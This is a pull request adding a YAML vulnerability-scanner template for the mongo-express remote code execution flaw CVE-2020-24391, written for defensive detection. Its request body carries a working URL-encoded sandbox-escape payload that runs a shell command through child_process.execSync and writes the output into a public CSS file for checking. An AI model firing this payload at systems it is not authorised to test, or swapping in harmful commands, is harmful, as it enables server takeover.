### PR TITLE
Create check for cve-2020-24391 mongo-express RCE

### DIFF
--- a/cves/2020/CVE-2020-24391.yaml
+++ b/cves/2020/CVE-2020-24391.yaml
@@ -1,0 +1,45 @@
+id: CVE-2020-24391
+
+info:
+  name: Remote Code Execution in mongo-express
+  author: leovalcante
+  severity: critical
+  description: Mongo-express uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to RCE in the context of the node server.
+  reference:
+    - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-24391
+  tags: mongo,express,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-24391
+
+
+requests:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /checkValid HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2Fout.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++
+
+      - |
+        GET /public/css/out.css HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        part: body
+        regex:
+          - 'uid=\d+(.+?)'

--- a/cves/2020/CVE-2020-24391.yaml
+++ b/cves/2020/CVE-2020-24391.yaml
@@ -1,18 +1,18 @@
 id: CVE-2020-24391
 
 info:
-  name: Remote Code Execution in mongo-express
+  name: Mongo Express Remote Code Execution
   author: leovalcante
   severity: critical
   description: Mongo-express uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to RCE in the context of the node server.
   reference:
     - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-24391
-  tags: mongo,express,rce
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-24391
+  tags: cve,cve2020,mongo,express,rce,intrusive
 
 
 requests:
@@ -26,20 +26,26 @@ requests:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2Fout.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++
+        document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++
 
       - |
-        GET /public/css/out.css HTTP/1.1
+        GET /public/css/{{randstr}}.css HTTP/1.1
         Host: {{Hostname}}
 
+    req-condition: true
     cookie-reuse: true
     matchers-condition: and
     matchers:
+      - type: regex
+        part: body_3
+        regex:
+          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
+
       - type: status
         status:
           - 200
 
+    extractors:
       - type: regex
-        part: body
         regex:
-          - 'uid=\d+(.+?)'
+          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"


### PR DESCRIPTION
### Template / PR Information

Create check for CVE-2020-24391 mongo-express RCE

- added CVE-2020-24391
- References:
    - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24391

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

N.A.

### Additional References:

N.A.